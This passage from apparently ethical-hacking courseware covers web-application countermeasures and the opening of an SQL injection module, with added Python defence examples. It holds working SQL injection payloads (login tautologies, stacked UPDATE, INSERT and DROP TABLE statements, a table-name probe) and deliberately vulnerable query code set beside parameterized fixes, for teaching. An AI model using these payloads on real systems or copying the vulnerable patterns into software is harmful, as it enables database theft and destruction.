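    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed: serialized data was modified")
    return RestrictedUnpickler(io.BytesIO(body)).load()


def sample_record() -> dict:
    """Constructed record containing one trusted non-primitive class."""
    return {"user": "alice", "roles": ["reader"], "since": datetime.date(2020, 1, 2)}


class Untrusted:
    """Any class not on the allow-list; its instances must never be rebuilt."""
```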
Using Components with Known Vulnerabilities
- Regularly check the versions of both client-side and server-side components and their dependencies
- Continuously monitor sources such as the National Vulnerability Database (NVD) for vulnerabilities in your components
- Apply security patches regularly
- Scan the components frequently with security scanners
- Enforce security policies and best practices for component use
- Review all the dependencies, including transitive dependencies, and ensure that they are not vulnerable
- Maintain a regular inventory of the versions of both client-side and server-side components
- Make sure to obtain components from official sources and accept only signed packages
Insufficient Logging and Monitoring
- Define the scope of assets covered in log monitoring to include business-critical areas
- Set up a minimum baseline for logging and ensure that it is followed for all assets
- Ensure that logs are logged with user context so that they are traceable
- Ensure that all logins, access control failures, and input validation failures can be logged with the necessary user context to identify suspicious accounts
- Make sure that high-value transactions consist of an audit trail with integrity controls to prevent tampering of the databases, such as append-only database tables
Directory Traversal

Web applications and their servers must be configured with appropriate file and directory permissions to avoid directory traversal vulnerabilities.

Some countermeasures against directory traversal attacks are as follows:
- Define access rights to the protected areas of the website

Some countermeasures against unvalidated redirects and forwards attacks are as follows:
- Avoid using redirects and forwards
- If the destination parameters cannot be avoided, ensure that the supplied value is valid and authorized for the user
- Avoid allowing a URL as user input for the destination and validate the URL
- Sanitize the input by generating a list of trusted URLs that includes a list of hosts or a regex
- Implement meta refresh in the page, as it can use hardcoded HTML to automatically redirect users to another page
Watering Hole Attack
- Apply software patches regularly to remove any vulnerabilities
- Monitor network traffic
- Secure the DNS server to prevent attackers from redirecting the site to a new location
- Analyze user behavior
- Inspect popular websites
- Use browser plug-ins that block HTTP redirects
- Disable third-party services such as content advertising, which track user activities
- Make sure to hide online activities with a VPN and enable the browser's private browsing feature
- Make sure to run the web browser in a virtual environment to limit access to the local system
Cross-Site Request Forgery

Using a CSRF attack, attackers lure a user's browser into sending a fake HTTP request, including the user session cookie and other authentication information, to a legitimate (vulnerable) web application to perform malicious activities.

Some countermeasures against cross-site request forgery attacks are as follows:
- Log off immediately after using a web application and clear the history
- Do not allow your browser and website to save the login details
- Check the HTTP Referrer header and, when processing a POST, ignore URL parameters
- Use flags such as HttpOnly and referer headers
- Use jQuery, which sends a custom X-Requested-With header
- Use CSRF tokens such as nonce tokens that are submitted through the hidden form field to avoid illegal access
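The token, Referer, and custom-header checks above combined, as an added example that is not courseware code: a per-session nonce issued into a hidden form field and compared in constant time, an Origin/Referer check against the site's own origin, POST-body-only token reading (URL parameters ignored), and the X-Requested-With check for AJAX endpoints. The session store, header names, and SITE_ORIGIN are constructed assumptions.

```python
"""Synchronizer-token CSRF protection (added example, not EC-Council
courseware code).

issue() stores a random nonce per session; hidden_field() renders it into the
form; verify() accepts a request only if the token from the POST body matches
in constant time, the Origin/Referer (when present) is our own site, and, for
AJAX endpoints, the X-Requested-With header is present.
"""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://app.example.com"                # assumption


class CsrfProtector:
    def __init__(self):
        self.tokens = {}                               # session id -> csrf token

    def issue(self, session_id: str) -> str:
        token = secrets.token_urlsafe(32)
        self.tokens[session_id] = token
        return token

    def hidden_field(self, session_id: str) -> str:
        token = self.tokens.get(session_id) or self.issue(session_id)
        return f'<input type="hidden" name="csrf_token" value="{token}">'

    def verify(self, session_id: str, headers: dict, form: dict, ajax: bool = False) -> bool:
        # 1. Nonce from the POST body only (URL parameters are never consulted).
        expected = self.tokens.get(session_id)
        submitted = form.get("csrf_token", "")
        if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
            return False
        # 2. Origin/Referer, when the browser sends them, must be our own site.
        for name in ("Origin", "Referer"):
            value = headers.get(name)
            if value:
                parts = urlsplit(value)
                if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
                    return False
        # 3. AJAX endpoints also require the custom header a plain cross-site
        #    form post cannot add (jQuery sends it automatically).
        if ajax and headers.get("X-Requested-With") != "XMLHttpRequest":
            return False
        return True
```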
Cookie/Session Poisoning

Browsers use cookies to maintain a session state. They also contain sensitive, session-specific data (e.g., user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs). Attackers engage in cookie/session poisoning by modifying the data in the cookie to gain escalated access or maliciously affect a user session. Developers must hence follow secure coding practices to secure web applications against such poisoning attacks. They must use proper session-token generation mechanisms to issue random session IDs.

Some countermeasures against cookie/session poisoning attacks are as follows:
- Do not store plaintext or weakly encrypted passwords in cookies
- Implement cookie timeout
- Cookie authentication credentials should be associated with an IP address
- Make logout functions available
- Validate all the cookie values to ensure that they are well-formed and correct
- Use virus and malware scanning software to protect the browser from any malicious scripts that hijack the cookies
- Clear stored cookies from the browser regularly
- Employ cookie randomization to change the website or a service cookie whenever the user makes a request
- Use a VPN that adopts high-grade encryption and traffic routing to prevent session sniffing
Web Service Attack

Use multiple layer protection and standard HTTP authentication techniques to defend against web service attacks. Because most business-to-business models incorporate applications, it becomes easier to restrict access to only valid users.

Some additional countermeasures against web service attacks are as follows:
- Configure WSDL-based Access Control Permissions to grant or deny access to any type of SOAP messages
- Use document-centric authentication credentials that use SAML
- Use multiple security credentials such as X.509 Cert, SAML assertions, and WS Security
- Deploy web-service-capable firewalls that can perform SOAP- and ISAPI-level filtering
- Configure firewalls/IDS systems for web service anomaly and signature detection
- Configure firewalls/IDS systems to filter improper SOAP and XML syntax
- Implement centralized in-line requests and response schema validation
- Block external references and use pre-fetched content when de-referencing URLs
- Maintain and update a secure repository of XML schemas
- Use password digests/Kerberos tickets/X.509 certificates in SOAP headers for authentication
- Use a digital signature for signing messages at the recipient's end and maintain the integrity of the messages
- Use URL authorization to restrict access to the web service file (.asmx)
- Authorize access to WSDL files using NTFS permissions
- Disable the documentation protocols to prevent the dynamic generation of WSDL
- Verify the caller's endpoint in the SOAP message before determining whether the SOAP message is processed by the BPEL engine
- Disable the SOAPAction field such as createUser or deleteUser in the HTTP request
- Avoid using easily guessable SOAPAction terminologies
- Disable the SOAPAction attribute when not in use
- Make sure to compare the operation within the SOAPAction and the SOAP body
Clickjacking Attack
- Use server-side methods such as the X-Frame-Options header and use its options DENY, SAMEORIGIN, and ALLOW-FROM URI to prevent the site from being framed outside the domain
- Never use client-side methods such as Frame busting or Frame breaking as they can be bypassed easily
- Mask the HTML document and reveal it only after verifying that the page is not framed
- Use the Content-Security-Policy (CSP) HTTP header as it provides considerable flexibility for defining sources in complex deployments
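The server-side anti-framing headers above together with the transport-layer items from the Security Misconfiguration list (redirect non-SSL requests, HSTS, the 'secure' flag on sensitive cookies), as one added example that is not courseware code: a response builder that applies the headers and an audit helper that reports which are missing. The chosen header values, cookie name, and request shape are assumptions.

```python
"""Security response headers and cookie flags (added example, not EC-Council
courseware code).

SECURITY_HEADERS carries the clickjacking defences (X-Frame-Options and CSP
frame-ancestors) plus HSTS and no-store caching; session_cookie() sets the
secure, HttpOnly and SameSite attributes; respond() redirects plain-HTTP
requests to HTTPS and attaches the headers; audit() lists missing headers.
"""
from http import cookies
from typing import Dict, List, Optional, Tuple

SECURITY_HEADERS: Dict[str, str] = {
    "X-Frame-Options": "DENY",                               # server-side framing control
    "Content-Security-Policy": "frame-ancestors 'none'; default-src 'self'; script-src 'self'",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Cache-Control": "no-store",                             # no caching of sensitive responses
}


def session_cookie(session_id: str) -> str:
    """Set-Cookie value for the session cookie with secure/HttpOnly/SameSite set."""
    jar = cookies.SimpleCookie()
    jar["sid"] = session_id
    jar["sid"]["secure"] = True
    jar["sid"]["httponly"] = True
    jar["sid"]["samesite"] = "Strict"
    jar["sid"]["path"] = "/"
    return jar["sid"].OutputString()


def respond(scheme: str, host: str, path: str,
            session_id: Optional[str] = None) -> Tuple[int, Dict[str, str]]:
    """Redirect non-SSL requests to the SSL page; otherwise add hardening headers."""
    if scheme != "https":
        return 301, {"Location": f"https://{host}{path}"}
    headers = dict(SECURITY_HEADERS)
    if session_id:
        headers["Set-Cookie"] = session_cookie(session_id)
    return 200, headers


def audit(headers: Dict[str, str]) -> List[str]:
    """Names of hardening headers absent from a response (a quick config check)."""
    return [name for name in SECURITY_HEADERS if name not in headers]
```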
JavaScript Hijacking
- Use .innerText rather than .innerHTML to encode the text automatically in JavaScript
- Avoid using the function eval due to its vulnerable nature
- Do not write serialization code
- Use the encoding library to safeguard the attributes and data elements and avoid building XML dynamically
- Use SSL/TLS for secure communication and perform encryption on the server instead of in the client-side code
- Build XML using any appropriate framework; avoid building XML manually
- Make sure to return JSON with an object externally, such as {"result": [{"object": "inside array"}]}
Username Enumeration
- Ensure that inputs that include user identifiers produce only generic error messages and outputs
- Use randomly generated data for usernames instead of sequential numbers
- Employ proper defenses against SQL injection and XSS attacks to prevent dumpable user enumeration
- Always make sure to apply CAPTCHA to all the input-accepting pages to prevent automatic data collection
- Use a WAF to detect and block all the individual IP addresses that try to make several requests
- Apply two-factor authentication (2FA) or padding techniques to the response time to prevent username enumeration
- Use random and complex usernames when creating the Active Directory username list
- Always use only complex and difficult-to-guess passwords and change the default usernames and passwords

Attack on Password Reset Mechanism
- Ensure that all password reset URLs are used only once and set the expiry time limit for executing the request
- Avoid automated requests generated through programs and enforce human checks using CAPTCHA
- Restrict the number of requests from any IP or device within a stipulated time
- Use advanced multi-factor authentication (MFA) techniques to prevent account hijacking with password reset tokens
RASP for Protecting Web Servers (slide)
RASP for Protecting Web Servers

Runtime Application Self-Protection (RASP) is a technology that provides security to applications that run on a server. RASP can be used for detecting runtime attacks on the real-time software application layer and can provide better visibility of hidden vulnerabilities. RASP can detect any malicious activity in the incoming traffic and also validate data requests. RASP protects both web and non-web applications and it can be used to prevent fake programs from being executed inside the application. RASP performs continuous monitoring to help remediate attacks such as unknown zero-day attacks at an early stage without any human intervention.

The RASP layer is placed within the application code. It deploys by monitoring the traffic coming into the server and applies protection mechanisms whenever threat vectors are detected. All the requests are examined through the RASP layer present between the server and the application without affecting the performance of the application. Furthermore, RASP can generate minimized false positives.

Benefits of using RASP
- Visibility: RASP offers greater visibility and lets the user have a detailed view of the application to monitor the attacks
- Collaboration and DevOps: It provides better collaboration and DevOps as it offers transparency that can provide similar and detailed information to both security professionals and developers
- Penetration testing: The increased visibility of RASP helps in avoiding duplicate testing. It also provides information about successful attacks and previously tested applications
- Incident response: RASP supports logging to facilitate incident response and security compliance by letting the user report on customized events without modifying the application

Figure 14.103: Overview of RASP
Bug Bounty Programs (slide)
Bug Bounty Programs

A bug bounty program is a challenge or agreement hosted by organizations, websites, or software developers for tech-savvy individuals or ethical hackers to participate and break into their security to report the latest bugs and vulnerabilities. This program focuses on identifying the latest security flaws in the software or any web application that most security developers fail to detect and which may hence pose a great threat. Therefore, individuals or ethical hackers who report the vulnerabilities are rewarded accordingly based on the severity of the bugs. Thus, any threat or flaw that evades the developer can be mitigated before it paves the way to sophisticated cyber-attacks. Many white-hat hackers contribute to this program as part of a comprehensive vulnerability disclosure framework and get rewarded for their work.

Many organizations benefit from such programs, as they need to maintain a keen watch on their system security and identify ignored vulnerabilities. Most of the latest bugs that are not detected by legacy security testing techniques and software tools can be exploited, resulting in major data loss. Such programs can also help organizations to avoid loss of money and reputation in the case of a data breach, as offering rewards through the bug bounty program is more economical. Therefore, most of the large companies use this program for strengthening their security, which in turn enhances their websites and programs.
Web Application Security Testing Tools

There are various web application security assessment tools available for scanning, detecting, and assessing the vulnerabilities/security of web applications. These tools reveal their security posture; you can use them to find ways to harden security and create robust web applications. Furthermore, these tools automate the process of accurate web application security assessment. This section discusses some web application security testing tools.
Acunetix WVS

Source: https://www.acunetix.com

Acunetix WVS checks web applications for SQL injections, cross-site scripting, etc. It includes advanced penetration testing tools, such as HTTP Editor and HTTP Fuzzer. It scans the ports of a web server and runs security checks against network services. It also tests web forms and password-protected areas. Furthermore, it provides effective vulnerability management by allowing third-party issue trackers such as Jira, GitLab, GitHub, and FogBugz.

Figure 14.104: Screenshot of Acunetix Web Vulnerability Scanner

N-Stalker Web App Security Scanner

Source: https://www.nstalker.com

N-Stalker Web App Security Scanner checks for vulnerabilities such as SQL injection, XSS, and other known attacks. It is a useful security tool for developers, system/security administrators, IT auditors, and staff, as it incorporates the well-known "N-Stealth HTTP Security Scanner" and its database of 39,000 web attack signatures along with a component-oriented web application security assessment technology.

Figure 14.105: Screenshot of N-Stalker Web Application Security Scanner

Browser Exploitation Framework (BeEF)

Source: http://beefproject.com

The Browser Exploitation Framework (BeEF) is an open-source penetration testing tool used to test and exploit web application and browser vulnerabilities. It provides the penetration tester with practical client-side attack vectors and leverages web and browser-based vulnerabilities to assess the security of a target and perform further intrusions.

Figure 14.106: Screenshot of Browser Exploitation Framework (BeEF)

Some additional web application security testing tools are as follows:
- Metasploit (https://www.metasploit.com)
- PowerSploit (https://github.com)
- Watcher Web Security Tool (https://www.casaba.com)
- Netsparker (https://www.netsparker.com)
- Arachni (http://arachni-scanner.com)
Web Application Firewalls

Web application firewalls (WAFs) secure websites, web applications, and web services against known and unknown attacks. They prevent data theft and manipulation of sensitive corporate and customer information. Some of the most commonly used WAFs are as follows:

dotDefender

Source: http://www.applicure.com

dotDefender™ is a software-based WAF that protects your website from malicious attacks such as SQL injection, path traversal, cross-site scripting, and others that result in website defacement. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior.

Figure 14.107: Screenshot of dotDefender web application firewall (the rule categories shown include SQL Comment, Union Select Statement, SQL CHAR Type, SQL SYS Commands, IS_SRVROLEMEMBER followed by "(", and MS SQL-specific SQL injection patterns)

Some additional web application firewalls are as follows:

- ServerDefender VP (https://www.port80software.com)
- HCL AppScan® Standard (https://www.hcltech.com)
- Radware's AppWall (https://www.radware.com)
- Qualys WAF (https://www.qualys.com)
- Barracuda Web Application Firewall (https://www.barracuda.com)
Module Summary

This module presented web application concepts. It also discussed various web application attacks in detail. Furthermore, it described the web application hacking methodology in detail. In addition, it illustrated various web application hacking tools. It also discussed web API, webhook, and web shell concepts. Moreover, it explained threat actors' ways of hacking web applications via web APIs, webhooks, and web shells. Subsequently, it presented various countermeasures against attempts to hack web applications. Finally, it ended with a detailed discussion on how to secure web applications using various security tools.

In the next module, we will discuss in detail how attackers as well as ethical hackers and pen testers perform SQL injection attacks on the target web application.
Certified Ethical Hacker

Module 15: SQL Injection

Module Objectives

SQL injection is one of the most common and damaging attacks that attackers can launch to take control of a website. Attackers use various tricks and techniques to compromise data-driven web applications, causing organizations to incur severe losses in terms of money, reputation, data, and functionality. This module will discuss SQL injection attacks as well as the tools and techniques used by attackers to perform such attacks.

At the end of this module, you will be able to:

- Describe SQL injection concepts
- Perform various types of SQL injection attacks
- Describe the SQL injection methodology
- Use various SQL injection tools
- Apply SQL injection countermeasures
- Use various SQL injection detection tools

Module Flow

SQL Injection Concepts | Types of SQL Injection | SQL Injection Methodology | SQL Injection Tools | Evasion Techniques | Countermeasures

SQL Injection Concepts

This section discusses the basic concepts of SQL injection attacks and their intensity. It starts with an introduction to SQL injection and the basics required to understand SQL injection attacks, followed by some examples of such attacks.
What is SQL Injection?

Structured Query Language (SQL) is a textual language used by a database server. SQL commands used to perform operations on the database include INSERT, SELECT, UPDATE, and DELETE. These commands are used to manipulate data in the database server.

Programmers often build SQL commands by concatenating client-supplied parameters into the query text, which makes it easy for attackers to inject commands. SQL injection is a technique used to take advantage of unsanitized input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this technique, the attacker injects malicious SQL queries into the user input form either to gain unauthorized access to a database or to retrieve information directly from the database. Such attacks are possible because of a flaw in the web application, not because of any issue with the database or the web server.

SQL injection attacks use a series of malicious SQL queries or SQL statements to manipulate the database directly. An application often uses SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. SQL injection attacks work because the application does not properly validate an input before passing it to an SQL statement.

Why Bother about SQL Injection?

SQL injection is a major issue for all database-driven websites. An attack can be attempted on any normal website or software package based on how it is used and how it processes user-supplied data. SQL injection can be used to implement the following attacks:

- Authentication Bypass: Using this attack, an attacker logs onto an application without providing a valid username and password, and gains administrative privileges.
- Authorization Bypass: Using this attack, an attacker alters authorization information stored in the database by exploiting an SQL injection vulnerability.
- Information Disclosure: Using this attack, an attacker obtains sensitive information that is stored in the database.
- Compromised Data Integrity: Using this attack, an attacker defaces a web page, inserts malicious content into web pages, or alters the contents of a database.
- Remote Code Execution: Using this attack, an attacker compromises the host OS.
SQL Injection and Server-side Technologies

Powerful server-side technologies such as ASP.NET and database servers allow developers to create dynamic, data-driven websites and web applications with incredible ease. These technologies implement business logic on the server side, which then serves incoming requests from clients. The server-side technology accesses, delivers, stores, and restores information. Various server-side technologies include ASP, ASP.NET, ColdFusion, JSP, PHP, Python, Ruby on Rails, and so on. Applications developed using any of these technologies are vulnerable to SQL injection attacks when they build queries from untrusted input. Web applications use various database technologies as part of their functionality. Relational databases commonly used for developing web applications include Microsoft SQL Server, Oracle, IBM DB2, and the open-source MySQL; all of them are susceptible to SQL injection. Developers sometimes unknowingly ignore secure coding practices when using these technologies, which makes the applications and relational databases vulnerable to SQL injection attacks. These attacks do not exploit a specific software vulnerability; instead, they target websites and web applications that do not follow secure coding practices to access and manipulate the data stored in a relational database.
Understanding HTTP POST Request

An HTTP POST request is a method for carrying the requested data to the web server. Unlike the HTTP GET method, the HTTP POST request carries the data as part of the message body rather than in the URL, so it does not end up in browser history, proxy logs, or web server access logs. For that reason it is considered safer than HTTP GET for submitting credentials, although the body is still sent in clear text unless HTTPS is used. HTTP POST requests can also pass large amounts of data to the server. They are ideal for communicating with an XML web service. These methods submit and retrieve data from the web server.

When a user provides information and clicks Submit, the browser submits a string to the web server that contains the user's credentials. This string is visible in the body of the HTTP or HTTPS POST request. The form that produces it looks as follows:

    <form action="/cgi-bin/login" method=post>
    Username: <input type=text name=username>
    Password: <input type=password name=password>
    <input type=submit value=login>
    </form>

Figure 15.1: Example of HTTP POST request
Understanding Normal SQL Query

A query is an SQL command. Programmers write and execute SQL code in the form of query statements. SQL queries include selecting data, retrieving data, inserting/updating data, and creating data objects such as databases and tables. Query statements begin with a command such as SELECT, UPDATE, CREATE, or DELETE. Queries are used in server-side technologies to communicate with an application's database. A user request supplies parameters to replace placeholders that may be used in the server-side language. From this, a query is constructed and then executed to fetch data or perform other tasks on the database.

The diagram below shows a typical SQL query. It is constructed with user-supplied values, and upon execution, it displays results from the database.

Figure 15.2: Example of normal SQL query (constructed by the server-side code BadLogin.aspx)
Understanding an SQL Injection Query

An SQL injection query exploits the normal execution of SQL. An attacker submits a request with values that will execute normally but return data from the database that the attacker seeks. The attacker can submit these malicious values because of the inability of the application to filter them before processing. If the values submitted by users are not properly validated, then the application can potentially be targeted by an SQL injection attack.

An HTML form that receives and passes information posted by the user to an Active Server Pages (ASP) script running on an IIS web server is the classic example of SQL injection. The information passed is the username and password. To create an SQL injection query, an attacker may submit the following values in application input fields, such as the username and password fields:

    Username: Blah' or 1=1 --
    Password: Springfield

As part of the normal execution of the query, these input values will replace the placeholders, and the query will appear as follows:

    SELECT Count(*) FROM Users WHERE UserName='Blah' or 1=1 --' AND Password='Springfield';

A close examination of this query reveals that the condition in the WHERE clause will always be true: the two hyphens turn the remainder of the line, including the password check, into a comment. This query executes successfully as there is no syntax error, and it does not violate the normal execution of the query.

The diagram below shows a typical SQL injection query.

Figure 15.3: Example of SQL injection attack
Understanding an SQL Injection Query: Code Analysis

Code analysis or code review is the most effective technique for identifying vulnerabilities or flaws in the code. An attacker exploits the vulnerabilities found in the code to gain access to the database. The application logs a user into an account by the following process:

1. A user enters a username and password that match a record in the Users table.
2. A dynamically generated SQL query is used to retrieve the number of matching rows.
3. The user is then authenticated and redirected to the requested page.
4. When the attacker enters blah' or 1=1 --, the SQL query will look like

    SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1 --' AND Password=''

A pair of hyphens indicates the beginning of a comment in SQL; therefore, the query simply becomes

    SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1

The server-side code is vulnerable because it splices the text of both form fields straight into the SQL string:

    // control name for the username text box is assumed; the page shows only txtPassword.Text
    string strQry = "SELECT Count(*) FROM Users WHERE UserName='" + txtUserName.Text + "' AND Password='" + txtPassword.Text + "'";
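The following is an added example, not code from the courseware, that reproduces the strQry pattern above in Python against an in-memory SQLite database so the effect of the tautology (or 1=1) and the end-of-line comment (--) can be observed, next to the parameterized form of the same query. The Users table, the column names UserName and Password, and the two sample accounts are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two accounts with dummy passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?)",
        [("admin", "s3cret"), ("jason", "springfield")],
    )
    return conn


def build_query(username: str, password: str) -> str:
    """The BadLogin.aspx pattern: form fields concatenated into the SQL text."""
    return ("SELECT Count(*) FROM Users WHERE UserName='" + username
            + "' AND Password='" + password + "'")


def vulnerable_login(conn, username: str, password: str) -> bool:
    """Authenticates if at least one row matches the dynamically built query."""
    count = conn.execute(build_query(username, password)).fetchone()[0]
    return count > 0


def safe_login(conn, username: str, password: str) -> bool:
    """Same logic with bound parameters: the driver sends the values apart from
    the SQL text, so quotes, OR and -- inside the input never become syntax."""
    row = conn.execute(
        "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?",
        (username, password),
    ).fetchone()
    return row[0] > 0


def demo() -> dict:
    """Runs the same inputs through both versions and returns the outcomes."""
    conn = make_db()
    return {
        "valid creds, vulnerable": vulnerable_login(conn, "jason", "springfield"),
        "wrong password, vulnerable": vulnerable_login(conn, "jason", "wrong"),
        # tautology plus end-of-line comment: the password check is commented out
        "blah' or 1=1 --, vulnerable": vulnerable_login(conn, "blah' or 1=1 --", "anything"),
        # tautology alone, injected through the password field; OR binds last
        "' or '1'='1, vulnerable": vulnerable_login(conn, "", "' or '1'='1"),
        "blah' or 1=1 --, safe": safe_login(conn, "blah' or 1=1 --", "anything"),
        "valid creds, safe": safe_login(conn, "jason", "springfield"),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:30} -> {'logged in' if ok else 'rejected'}")
```

Running the block prints one line per case; the two injected inputs log in through vulnerable_login and are rejected by safe_login, while the legitimate credentials work in both.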
Example of a Web Application Vulnerable to SQL Injection: BadProductList.aspx

This page displays products from the Northwind database and allows users to filter the resulting list of products using a textbox called txtFilter. Like the previous example (BadLogin.aspx), this code is vulnerable to SQL injection attacks: the executed SQL is constructed dynamically from a user-supplied value.

Figure 15.4: Example of vulnerable web application: BadProductList.aspx (http://www.certifiedhacker.com/BadProductList.aspx)
Example of a Web Application Vulnerable to SQL Injection: Attack Analysis

Most websites provide a search function to enable users to find a specific product or service quickly. A separate Search field is maintained on the website in an area that is easily viewable. As with any other input field, attackers target this field to perform SQL injection attacks. An attacker enters specific input values in the Search field to perform an SQL injection attack.

Figure 15.5: Example of web application vulnerable to SQL injection (CertifiedHackerShop.com search field and the SQL query executed)
Examples of SQL Injection

An SQL injection query exploits the normal execution of SQL. The attacker uses various SQL commands to modify the values in the database.

Figure 15.6: Example of SQL injection attack (attacker launching SQL injection through the Forgot Password form of the vulnerable website CertifiedHacker.com)

The following table lists some examples of SQL injection attacks:

Updating Table
    Attacker SQL query: blah'; UPDATE jb-customers SET jb-email = 'info@certifiedhacker.com' WHERE email = 'jason@springfield.com'; --
    SQL query executed: SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE email = 'blah'; UPDATE jb-customers SET jb-email = 'info@certifiedhacker.com' WHERE email = 'jason@springfield.com'; --';

Adding New Records
    Attacker SQL query: blah'; INSERT INTO jb-customers ('jb-email', 'jb-passwd', 'jb-login_id', 'jb-last_name') VALUES ('jason@springfield.com', 'hello', 'jason', 'jason springfield'); --
    SQL query executed: SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE email = 'blah'; INSERT INTO jb-customers ('jb-email', 'jb-passwd', 'jb-login_id', 'jb-last_name') VALUES ('jason@springfield.com', 'hello', 'jason', 'jason springfield'); --';

Identifying the Table Name
    Attacker SQL query: blah' AND 1=(SELECT COUNT(*) FROM mytable); --
    SQL query executed: SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE email = 'blah' AND 1=(SELECT COUNT(*) FROM mytable); --';
    Note: You will need to guess table names here.

Deleting a Table
    Attacker SQL query: blah'; DROP TABLE Creditcard; --
    SQL query executed: SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE jb-email = 'blah'; DROP TABLE Creditcard; --';

Returning More Data
    Attacker SQL query: blah' OR 1=1
    SQL query executed: SELECT * FROM User_Data WHERE Email_ID = 'blah' OR 1=1

Table 15.1: Attack SQL queries

The UPDATE, INSERT, and DROP TABLE examples append a second statement after a semicolon; they only work where the database driver and API accept several statements in one call. Many drivers execute a single statement and reject the remainder, in which case the attacker falls back on UNION, Boolean, or error-based techniques that stay inside the original statement.
Module Flow

SQL Injection Concepts | Types of SQL Injection | SQL Injection Methodology | SQL Injection Tools | Evasion Techniques | Countermeasures

Types of SQL Injection

Attackers use various tricks and techniques to view, manipulate, insert, and delete data from an application's database. Depending on the technique used, there are several types of SQL injection attacks. This section discusses the various types of SQL injection attacks. Attackers use SQL injection attacks in many different ways by corrupting SQL queries.

In an SQL injection attack, the attacker injects malicious code through an SQL query that can read sensitive data and can even modify (insert/update/delete) it.

There are three main types of SQL injection:

- In-band SQL Injection: An attacker uses the same communication channel to perform the attack and retrieve the results. In-band attacks are commonly used and easy-to-exploit SQL injection attacks. The most commonly used in-band SQL injection attacks are error-based SQL injection and UNION SQL injection.

- Blind/Inferential SQL Injection: In blind/inferential injection, the attacker has no error messages from the system to work on. Instead, the attacker simply sends a malicious SQL query to the database. This type of SQL injection takes longer to execute because the result returned is generally in Boolean form. Attackers use true or false results to determine the structure of the database and the data. In the case of inferential SQL injection, no data is transmitted through the web application, and it is not possible for an attacker to retrieve the actual result of the injection; therefore, it is called blind SQL injection.

- Out-of-Band SQL Injection: Attackers use different communication channels (such as database email functionality or file writing and loading functions) to perform the attack and obtain the results. This type of attack is difficult to perform because the attacker needs to communicate with the server and determine the features of the database server used by the web application.

The diagram below shows the different types of SQL injection:

Figure 15.7: Types of SQL Injection (in-band, blind/inferential, and out-of-band, with their sub-types)
In-Band SQL Injection

In in-band SQL injection, attackers use the same communication channel to perform the attack and retrieve the results. Depending on the technique used, there are various types of in-band SQL injection attacks. The most commonly used in-band SQL injection attacks are error-based SQL injection and UNION SQL injection.

The different types of in-band SQL injection are as follows:

- Error-based SQL Injection

  An attacker intentionally inserts bad inputs into an application, causing it to return database errors. The attacker reads the resulting database-level error messages to find an SQL injection vulnerability in the application. Accordingly, the attacker then injects SQL queries that are specifically designed to compromise the data security of the application. This approach is very useful for building a vulnerability-exploiting request.

- System Stored Procedure

  The risk of executing a malicious SQL query in a stored procedure increases if the web application does not sanitize the user inputs used to dynamically construct SQL statements for that stored procedure. An attacker may use malicious inputs to execute the malicious SQL statements in the stored procedure. Attackers exploit databases' stored procedures to perpetrate their attacks.

  For example, the following T-SQL procedure builds its query by string concatenation and runs it with EXEC, so the parameters are never treated as data:

    CREATE PROCEDURE Login @user_name varchar(20), @password varchar(20)
    AS
    DECLARE @query varchar(250)
    SET @query = 'SELECT 1 FROM usertable WHERE username = ''' + @user_name + ''' AND password = ''' + @password + ''''
    EXEC(@query)
    GO

  If the attacker enters the following inputs in the application input fields, with the above stored procedure running in the backend, he/she will be able to log in with any password:

    User input: Username: anyusername' or 1=1 --    Password: anypassword

- Illegal/Logically Incorrect Query

  An attacker may gain knowledge of injectable parameters, data types, names of tables, and so on by injecting illegal/logically incorrect requests. In this SQL injection attack, an attacker intentionally sends an incorrect query to the database to generate an error message that may be useful for performing further attacks. This technique may help an attacker to extract the structure of the underlying database.

  For example, to find the column name, an attacker may give the following malicious input:

    Username: 'Bob"

  The resultant query will be

    SELECT * FROM Users WHERE UserName = ''Bob"' AND password=''

  After executing the above query, the database may return the following error message:

    Incorrect syntax near 'Bob'. Unclosed quotation mark after the character string '' AND Password='xxx''
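As an added example (not courseware code), the same illegal-input probe against SQLite from Python: the username is spliced into the query, and when the input ends in an unbalanced single quote the error text that comes back echoes the tail of the query, which is exactly what an attacker needs to see the structure around the injection point. The trailing single quote is used instead of the page's 'Bob" input because SQLite reports an unterminated string by quoting the rest of the statement; the Users table and the error-surfacing behaviour are constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table; the password is a dummy value."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('Bob', 'dummy')")
    return conn


def lookup_vulnerable(conn, username: str, password: str = ""):
    """The page's pattern: both fields spliced into the SQL text.
    Returns (rows, error_text); a real app would leak error_text in a 500 page."""
    sql = ("SELECT * FROM Users WHERE UserName = '" + username
           + "' AND password='" + password + "'")
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return [], str(exc)


def lookup_safe(conn, username: str, password: str = ""):
    """Parameterized: the same probe is just a username that does not exist."""
    rows = conn.execute(
        "SELECT * FROM Users WHERE UserName = ? AND password = ?",
        (username, password),
    ).fetchall()
    return rows, None


def probe(conn, username: str):
    """Illegal-query probe: returns the database error text, or None if the
    input was accepted. An error whose text echoes the query tail confirms
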